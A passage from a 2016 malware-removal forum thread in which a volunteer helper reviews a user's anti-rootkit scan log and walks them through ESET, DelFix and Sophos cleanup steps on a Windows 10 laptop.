\SystemRoot\System32\DRIVERS\fvevol.sys
\SystemRoot\System32\drivers\volsnap.sys
\SystemRoot\System32\drivers\rdyboost.sys
\SystemRoot\System32\Drivers\mup.sys
\SystemRoot\System32\drivers\intelpep.sys
\SystemRoot\System32\drivers\disk.sys
\SystemRoot\System32\drivers\CLASSPNP.SYS
\SystemRoot\System32\Drivers\crashdmp.sys
\SystemRoot\System32\drivers\cdrom.sys
\SystemRoot\system32\drivers\NSx64\1607010.020\ccSetx64.sys
\SystemRoot\system32\drivers\filecrypt.sys
\SystemRoot\system32\drivers\tbs.sys
\SystemRoot\system32\drivers\NSx64\1607010.020\Ironx64.SYS
\??\C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
\SystemRoot\System32\Drivers\Null.SYS
\SystemRoot\System32\Drivers\Beep.SYS
\SystemRoot\System32\drivers\BasicDisplay.sys
\SystemRoot\System32\drivers\watchdog.sys
\SystemRoot\System32\drivers\dxgkrnl.sys
\SystemRoot\System32\drivers\BasicRender.sys
\SystemRoot\System32\Drivers\Npfs.SYS
\SystemRoot\System32\Drivers\Msfs.SYS
\SystemRoot\system32\DRIVERS\tdx.sys
\SystemRoot\system32\DRIVERS\TDI.SYS
\SystemRoot\System32\DRIVERS\netbt.sys
\SystemRoot\system32\drivers\afd.sys
\SystemRoot\system32\DRIVERS\bwcW10x64.sys
\SystemRoot\System32\drivers\vwififlt.sys
\SystemRoot\System32\drivers\pacer.sys
\SystemRoot\system32\drivers\netbios.sys
\SystemRoot\system32\DRIVERS\rdbss.sys
\SystemRoot\system32\drivers\XLGuard.sys
\SystemRoot\System32\Drivers\NSx64\1607010.020\SYMNETS.SYS
\SystemRoot\system32\drivers\NSx64\1607010.020\SRTSPX64.SYS
\SystemRoot\system32\drivers\nsiproxy.sys
\SystemRoot\System32\drivers\npsvctrig.sys
\SystemRoot\System32\drivers\mssmbios.sys
\??\C:\Program Files (x86)\Norton Security\NortonData\22.6.0.142\Definitions\IPSDefs\20160902.001\IDSvia64.sys
\SystemRoot\System32\drivers\gpuenergydrv.sys
\??\C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys
\??\C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys
\SystemRoot\System32\Drivers\dfsc.sys
\??\C:\Program Files (x86)\Norton Security\NortonData\22.6.0.142\Definitions\BASHDefs\20160826.008\BHDrvx64.sys
\SystemRoot\system32\DRIVERS\ahcache.sys
\SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_912dfdedc3d2f520\CompositeBus.sys
\SystemRoot\System32\drivers\kdnic.sys
\SystemRoot\System32\drivers\umbus.sys
\SystemRoot\system32\DRIVERS\nvlddmkm.sys
\SystemRoot\system32\DRIVERS\igdkmd64.sys
\SystemRoot\System32\drivers\USBXHCI.SYS
\SystemRoot\system32\drivers\ucx01000.sys
\SystemRoot\System32\drivers\TeeDriverW8x64.sys
\SystemRoot\System32\drivers\Netwtw02.sys
\SystemRoot\system32\DRIVERS\wdiwifi.sys
\SystemRoot\System32\drivers\vwifibus.sys
\SystemRoot\System32\drivers\e2xw10x64.sys
\SystemRoot\System32\drivers\asmtxhci.sys
\SystemRoot\System32\drivers\i8042prt.sys
\SystemRoot\System32\drivers\ssps2.sys
\SystemRoot\system32\DRIVERS\SynTP.sys
\SystemRoot\system32\DRIVERS\USBD.SYS
\SystemRoot\System32\drivers\kbdclass.sys
\SystemRoot\System32\drivers\mouclass.sys
\SystemRoot\System32\drivers\CmBatt.sys
\SystemRoot\System32\drivers\BATTC.SYS
\SystemRoot\System32\drivers\wmiacpi.sys
\SystemRoot\System32\drivers\HDAudBus.sys
\SystemRoot\System32\drivers\portcls.sys
\SystemRoot\System32\drivers\drmk.sys
\SystemRoot\System32\drivers\ks.sys
\SystemRoot\system32\DRIVERS\Smb_driver_Intel.sys
\SystemRoot\System32\drivers\intelppm.sys
\SystemRoot\System32\drivers\acpipagr.sys
\SystemRoot\System32\drivers\UEFI.sys
\SystemRoot\system32\drivers\ksthunk.sys
\SystemRoot\System32\drivers\NdisVirtualBus.sys
\SystemRoot\System32\drivers\swenum.sys
\SystemRoot\System32\drivers\ssdevfactory.sys
\SystemRoot\System32\drivers\rdpbus.sys
\SystemRoot\System32\drivers\UsbHub3.sys
\SystemRoot\system32\drivers\RTKVHD64.sys
\SystemRoot\system32\DRIVERS\IntcDAud.sys
\SystemRoot\System32\drivers\usbccgp.sys
\SystemRoot\System32\drivers\asmthub3.sys
\SystemRoot\System32\drivers\hidusb.sys
\SystemRoot\System32\drivers\HIDCLASS.SYS
\SystemRoot\System32\drivers\HIDPARSE.SYS
\SystemRoot\System32\drivers\sshid.sys
\SystemRoot\System32\drivers\mshidkmdf.sys
\SystemRoot\System32\Drivers\fastfat.SYS
\SystemRoot\System32\drivers\kbdhid.sys
\SystemRoot\System32\drivers\mouhid.sys
\SystemRoot\system32\DRIVERS\ibtusb.sys
\SystemRoot\System32\drivers\BTHUSB.sys
\SystemRoot\System32\drivers\bthport.sys
\SystemRoot\System32\win32k.sys
\SystemRoot\System32\win32kfull.sys
\SystemRoot\System32\win32kbase.sys
\SystemRoot\System32\Drivers\dump_diskdump.sys
\SystemRoot\System32\Drivers\dump_iaStorA.sys
\SystemRoot\System32\Drivers\dump_dumpfve.sys
\SystemRoot\System32\drivers\dxgmms2.sys
\SystemRoot\System32\drivers\monitor.sys
\SystemRoot\System32\TSDDD.dll
\SystemRoot\system32\drivers\WudfPf.sys
\SystemRoot\system32\drivers\luafv.sys
\SystemRoot\system32\drivers\storqosflt.sys
\SystemRoot\System32\drivers\WUDFRd.sys
\SystemRoot\System32\drivers\mshidumdf.sys
\SystemRoot\system32\drivers\mslldp.sys
\SystemRoot\system32\drivers\lltdio.sys
\SystemRoot\system32\drivers\rspndr.sys
\SystemRoot\system32\drivers\ndisuio.sys
\SystemRoot\system32\DRIVERS\nwifi.sys
\SystemRoot\system32\drivers\HTTP.sys
\SystemRoot\system32\DRIVERS\bowser.sys
\SystemRoot\system32\DRIVERS\mrxsmb.sys
\SystemRoot\system32\DRIVERS\mrxsmb20.sys
\SystemRoot\System32\drivers\mpsdrv.sys
\SystemRoot\System32\drivers\condrv.sys
\SystemRoot\system32\drivers\mmcss.sys
\SystemRoot\System32\DRIVERS\srvnet.sys
\SystemRoot\System32\DRIVERS\srv2.sys
\SystemRoot\system32\DRIVERS\mrxsmb10.sys
\SystemRoot\system32\drivers\xlwfp.sys
\SystemRoot\System32\drivers\tcpipreg.sys
\SystemRoot\System32\DRIVERS\srv.sys
\SystemRoot\system32\drivers\peauth.sys
\SystemRoot\System32\drivers\vwifimp.sys
\SystemRoot\System32\drivers\tunnel.sys
\??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
\??\C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys
\SystemRoot\System32\Drivers\NSx64\1607010.020\SRTSP64.SYS
\SystemRoot\System32\drivers\rdpvideominiport.sys
\SystemRoot\System32\cdd.dll
\SystemRoot\system32\drivers\nvvad64v.sys
\??\C:\Windows\system32\drivers\mbamchameleon.sys
\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys
----------- End -----------
Done!
 
Scan started
Database versions:
  main:    v2016.09.04.04
  rootkit: v2016.08.15.01
 
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xffffe0006a79c060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0006a708b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0006a79c060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0006a6e4c40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0006a6e3bf0, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0006a7fa400, DeviceName: \Device\00000040\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: 0
 
GPT Protective MBR Partition information:
 
    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295
 
    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
GPT Partition information:
 
    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 1293462221
    GPT Header CurrentLba = 1 BackupLba 250069679
    GPT Header FirstUsableLba 34  LastUsableLba 250069646
    GPT Header Guid 2b9b6641-6da4-11e6-aef3-b88198e12412
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128
 
    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 1293462221
    Backup GPT header CurrentLba = 250069679 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 250069646
    Backup GPT header Guid 2b9b6641-6da4-11e6-aef3-b88198e12412
    Backup GPT header Contains 128 partition entries starting at LBA 250069647
    Backup GPT header Partition entry size = 128
 
    Partition 0 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b
    Partition ID 109ff3a0-5d91-48d3-b2a4-b8c379efcea
    FirstLBA 2048  Last LBA 616447
    Attributes 0
    Partition Name                 EFI system partition
 
    GPT Partition 0 is bootable
    Partition 1 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID a7e27d96-895e-4716-85a1-5383cc607c69
    FirstLBA 616448  Last LBA 878591
    Attributes 0
    Partition Name         Microsoft reserved partition
 
    Partition 2 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac
    Partition ID c23b4a0-14fa-48d8-b957-c32999dbb912
    FirstLBA 878592  Last LBA 2721791
    Attributes 1
    Partition Name                 Basic data partition
 
    Partition 3 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac
    Partition ID 610ffedf-1c0c-4328-b78b-fe21b40c7a0
    FirstLBA 2721792  Last LBA 39821311
    Attributes 1
    Partition Name                 Basic data partition
 
    Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID 14bc8997-f9f2-4fa0-82db-d34582eac90
    FirstLBA 39821312  Last LBA 250069646
    Attributes 0
    Partition Name                 Basic data partition
 
Disk Size: 128035676160 bytes
Sector size: 512 bytes
 
Done!
Physical Sector Size: 512
Drive: 1, DevicePointer: 0xffffe0006a79b060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
--------- Disk Stack ------
DevicePointer: 0xffffe0006a6d5b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xffffe0006a79b060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
DevicePointer: 0xffffe0006a6e4a40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0006a6e4e40, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xffffe0006a7a1060, DeviceName: \Device\00000042\, DriverName: \Driver\iaStorA\
------------ End ----------
Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
Drive 1
Scanning MBR on drive 1...
Inspecting partition table:
This drive is a GPT Drive.
MBR Signature: 55AA
Disk Signature: FB0F8F39
 
GPT Protective MBR Partition information:
 
    Partition 0 type is EFI-GPT (0xee)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 1  Numsec = 4294967295
 
    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0  Numsec = 0
 
GPT Partition information:
 
    GPT Header Signature 4546492050415254
    GPT Header Revision 65536 Size 92 CRC 3532378669
    GPT Header CurrentLba = 1 BackupLba 1953525167
    GPT Header FirstUsableLba 34  LastUsableLba 1953525134
    GPT Header Guid 737f84f7-c37c-45cf-9156-49b7294efe5c
    GPT Header Contains 128 partition entries starting at LBA 2
    GPT Header Partition entry size = 128
 
    Backup GPT header Signature 4546492050415254
    Backup GPT header Revision 65536 Size 92 CRC 3532378669
    Backup GPT header CurrentLba = 1953525167 BackupLba 1
    Backup GPT header FirstUsableLba 34  LastUsableLba 1953525134
    Backup GPT header Guid 737f84f7-c37c-45cf-9156-49b7294efe5c
    Backup GPT header Contains 128 partition entries starting at LBA 1953525135
    Backup GPT header Partition entry size = 128
 
    Partition 0 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b
    Partition ID 2ec132ec-e8d5-48e7-9b38-cdaa209928e9
    FirstLBA 2048  Last LBA 616447
    Attributes 0
    Partition Name                 EFI system partition
 
    GPT Partition 0 is bootable
    Partition 1 Type e3c9e316-b5c-4db8-817d-f92df0215ae
    Partition ID af632d3c-afa3-401d-8970-67e41e76b6
    FirstLBA 616448  Last LBA 878591
    Attributes 0
    Partition Name         Microsoft reserved partition
 
    Partition 2 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID 9e687ab3-c664-45a6-a74e-88eacfb1ea77
    FirstLBA 878592  Last LBA 1172989951
    Attributes 0
    Partition Name                 Basic data partition
 
    Partition 3 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac
    Partition ID ecee037-27e0-440b-a7e2-25edeb1b1ae1
    FirstLBA 1172989952  Last LBA 1174833151
    Attributes 1
    Partition Name                 Basic data partition
 
    Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7
    Partition ID 33d8cbfb-7ace-4c67-96ae-7af1ffde6f7a
    FirstLBA 1174833152  Last LBA 1916424191
    Attributes 0
    Partition Name                 Basic data partition
 
    Partition 5 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac
    Partition ID 254f8581-fd27-409b-9949-a4be12e9ba4
    FirstLBA 1916424192  Last LBA 1953523711
    Attributes 1
    Partition Name                 Basic data partition
 
Disk Size: 1000204886016 bytes
Sector size: 512 bytes
 
Done!
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System\3a4f0a84904c4b568b6621b30306261c\System.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\ea350a39df1334a4911cc92f58c85dd0\System.Core.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\d1e6c00e339d9f64674d3a9e74403a7e\System.Configuration.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\e1be3ec32aa5187ec7d760c55c55f6c0\System.Xml.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d18bf45b9a63cd0386949a0fa5ab7d1e\System.Management.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\9f3be891850bb38ac107988533745206\System.ServiceModel.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\e95c04a954155809c430a0c604a6416e\System.ServiceModel.Internals.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\84f2250c582e8bafeaf4fd9e407ba22a\SMDiagnostics.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\2f18aee9e26301da57394e94416a20ba\System.Runtime.Serialization.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\b1e856be883549d78b2a9a329a435afb\System.ServiceModel.Channels.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\f9b0285f1ac6dedb94b8bd9bfc4c3b77\System.ServiceModel.Web.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\3e6c997c0f5d4d89a00c29e535fbddfb\System.IdentityModel.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\e847f678b31f083a1879f08d074b4f42\System.Data.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\7fdc82405cb33617ecc90c5c4d42195e\System.Configuration.Install.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\387d8c4acd15ff2d479ebd491edb8e51\System.Drawing.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\36f6762d29fc05f4d32b01a56ea0f8f8\System.Windows.Forms.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\75569710b0fc4e7ad94b947c006b335b\System.Numerics.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\ebef418f08844f99287024d1790a62a4\System.Transactions.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\0555aeb073cb90d425082d8b4360f814\WindowsBase.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\2586b192cf7cea9686568c6d76361cc2\PresentationCore.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\b32414460ef8695cdd49dfc3e6c3f079\PresentationFramework.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\fc7551596b2c93328a98aa161ccc1e68\System.Xaml.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\eec68ed9ee89f3edf2bd0e4a8a681f46\System.Xml.Linq.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\bfeb2b2788c26642762c328c5b75016c\System.ComponentModel.DataAnnotations.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\342e1e9ad63227e979f93ef84d0eef1a\PresentationFramework.Aero2.ni.dll" is sparse (flags = 32768)
File "C:\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\377c0886b594b94f34fd56b566af365d\UIAutomationTypes.ni.dll" is sparse (flags = 32768)
File "C:\Users\User\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
File "C:\Windows\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
Scan finished
=======================================
 
 
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
Removal finished
 


#10 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 07:55 AM

That's good news.

 

Just to double-check for remnants, leftover keys and installers...

 

eset-mobile-security_5619.png?width=64&h  ESET Online scanner

 

Follow this link or right click and "copy link location", then paste the link into the address bar on your newly opened browser instance

Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

  • Firstly, Accept the Terms and click Start
  • Click Enable detection of potentially unwanted applications and click Start again.

 

ESET will then download updates, install and begin scanning your computer. Please be patient as this can take some time.

 

  • When the scan completes, click Next.
  • Check Uninstall application on close and Delete quarantined files, then click the Finish button.

 

106x9g7.jpg

 

When you click finish the browser will not close but will offer you ESET products. Be aware the scan has actually finished and you need to close the browser window and reboot your computer to complete the process.

 

Next...

 

This step will remove all cleaning tools we used, it'll reset restore points (so you won't get reinfected by accidentally using some older restore point) and it'll make some other minor adjustments...
This is a very crucial step so make sure you don't skip it.
Download 51a5ce45263de-delfix.pngDelFix by Xplode to your desktop. Delfix will delete all the used tools and logfiles.

Double-click Delfix.exe to start the tool.
Make sure the following items are checked:

  • Activate UAC (optional; some users prefer to keep it off)
  • Remove disinfection tools
  • Create registry backup
  • Purge System Restore
  • Reset system settings

Now click "Run" and wait patiently.

 

How did you go? Is everything ok now?



#11 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 06:53 PM

Hi TsVk,

 

I'm not sure why but the ESET online scanner that you recommended was not able to complete the scan on my hard disk.

It failed once yesterday night and i was hoping that by leaving it overnight, the scan will be completed by the next morning but it shows up as being a software that is not responsive.

 

I will run a full diagnostic using Norton instead to check the health of my system

 

DELFIX LOG

 

# DelFix v1.013 - Logfile created 05/09/2016 at 07:46:12
# Updated 17/04/2016 by Xplode
# Username : User - MSI
# Operating System : Windows 10 Home Single Language  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\AdwCleaner
Deleted : C:\Users\User\Desktop\mbar
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########
 
Thank you for all your help!
I will take more precaution with the stuff i download in the future


#12 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 07:04 PM

Hi HonSern

 

Let's just give it one last scan to make sure there's nothing left (ESET not completing concerns me)

 

Download Sophos Free Virus Removal Tool and save it to your desktop.

  • Double click the icon and select Run
  • Click Next
  • Select I accept the terms in this license agreement, then click Next twice
  • Click Install
  • Click Finish to launch the program
  • Once the virus database has been updated click Start Scanning
  • If any threats are found click Details, then View log file... (bottom left hand corner)
  • Copy and paste the results in your reply
  • Close the Notepad document, close the Threat Details screen, then click Start cleanup
  • Click Exit to close the program

Let me know how you go.

 

TsVk!



#13 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 08:16 PM

Hi TsVk,

 

Will do so tonight after coming back from work 

 

Thanks! 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users